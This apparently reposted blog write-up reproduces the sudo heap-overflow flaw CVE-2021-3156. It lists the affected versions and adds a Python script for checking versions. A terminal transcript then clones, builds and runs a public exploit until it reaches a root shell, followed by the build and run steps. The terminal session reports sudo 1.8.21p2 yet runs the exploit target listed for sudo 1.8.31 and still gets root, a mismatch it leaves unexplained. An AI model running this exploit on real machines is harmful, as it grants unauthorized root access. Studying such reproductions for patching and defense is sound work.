Linux Sudo Privilege Escalation Vulnerability (CVE-2021-3156) Reproduction

I. Vulnerability overview

When sudo runs a command in shell mode with the -s or -i command-line option, it escapes special characters in the command's arguments with backslashes. But when sudoedit is run with the -s or -i flag, no escaping is actually performed, which can cause a buffer overflow. As long as the sudoers file exists (typically /etc/sudoers), an attacker who is an ordinary local user can use sudo to gain root access to the system.

II. Affected versions

sudo 1.8.2 to 1.8.31p2

sudo 1.9.0 to 1.9.5p1

Unaffected version

sudo >= 1.9.5p2
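A first-pass check of a sudo version string against the ranges listed above, as an added example that is not from the original post or the sudo project; the function names are assumptions. Distribution packages can carry a backported fix under an unchanged upstream version, so a match means the vendor advisory needs checking, not that the host is confirmed vulnerable.

```python
import re
import subprocess

# Affected upstream ranges as listed on this page (inclusive bounds).
AFFECTED_RANGES = [("1.8.2", "1.8.31p2"), ("1.9.0", "1.9.5p1")]

# sudo versions look like 1.8.31, 1.8.31p2 or 1.9.5p1.
_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(text):
    """Return (major, minor, micro, patch) from a bare version string or
    from `sudo -V` output. A missing pN suffix is treated as p0."""
    match = _VERSION_RE.search(text)
    if match is None:
        raise ValueError(f"no sudo version found in {text!r}")
    major, minor, micro, patch = match.groups()
    return (int(major), int(minor), int(micro), int(patch or 0))


def in_affected_range(text):
    """True if the upstream version falls inside a range listed above."""
    version = parse_sudo_version(text)
    return any(
        parse_sudo_version(low) <= version <= parse_sudo_version(high)
        for low, high in AFFECTED_RANGES
    )


def check_local_sudo():
    """Run `sudo -V` on this host and classify the reported version."""
    output = subprocess.run(
        ["sudo", "-V"], capture_output=True, text=True, check=True
    ).stdout
    return output.splitlines()[0], in_affected_range(output)


if __name__ == "__main__":
    # Constructed sample inputs; the first is the `sudo -V` line format.
    for sample in ["Sudo version 1.8.21p2", "1.8.32", "1.9.5p1", "1.9.5p2"]:
        state = "in affected range" if in_affected_range(sample) else "not listed"
        print(f"{sample:24} {state}")
    banner, affected = check_local_sudo()
    print(f"local: {banner} -> {'in affected range' if affected else 'not listed'}")
```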

III. Vulnerability reproduction

Obtaining root privileges:

Specific operation process:

ubuntu@VM-0-5-ubuntu:~$ git clone https://github.91chifun.workers.dev//https://github.com/blasty/CVE-2021-3156.git
Cloning into 'CVE-2021-3156'...
warning: redirecting to https://github.com.cnpmjs.org/blasty/CVE-2021-3156.git/
remote: Enumerating objects: 11, done.
remote: Counting objects: 100% (11/11), done.
remote: Compressing objects: 100% (9/9), done.
remote: Total 11 (delta 2), reused 11 (delta 2), pack-reused 0
Unpacking objects: 100% (11/11), done.
ubuntu@VM-0-5-ubuntu:~$ cd C
Cerberus/ CVE-2020-13942/ CVE-2020-14882_ALL/ CVE-2020-8193/ CVE-2021-3156/
ubuntu@VM-0-5-ubuntu:~$ cd CVE-2021-3156/
ubuntu@VM-0-5-ubuntu:~/CVE-2021-3156$ make
rm -rf libnss_X
mkdir libnss_X
gcc -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
ubuntu@VM-0-5-ubuntu:~/CVE-2021-3156$ ./sudo-hax-me-a-sandwich
** CVE-2021-3156 PoC by blasty <[email protected]>
usage: ./sudo-hax-me-a-sandwich <target>
available targets:
------------------------------------------------------------
 0) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
 1) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
------------------------------------------------------------
ubuntu@VM-0-5-ubuntu:~/CVE-2021-3156$ sudo -V
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2
ubuntu@VM-0-5-ubuntu:~/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 0
** CVE-2021-3156 PoC by blasty <[email protected]>
Using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31'
** Pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),114(sambashare),500(ubuntu)
#

Exploit address:

https://github.com/blasty/CVE-2021-3156

Operation steps:

build:

$ make

list targets:

$ ./sudo-hax-me-a-sandwich

run:

$ ./sudo-hax-me-a-sandwich <target_number>

Disclaimer: The security tools and procedures (methods) provided on this site may be offensive in nature and are intended only for security research and teaching; use them at your own risk!

Disclaimer: Copyright belongs to the author. Commercial reprint please contact the author for authorization, non-commercial reprint please indicate the source.

thelostworld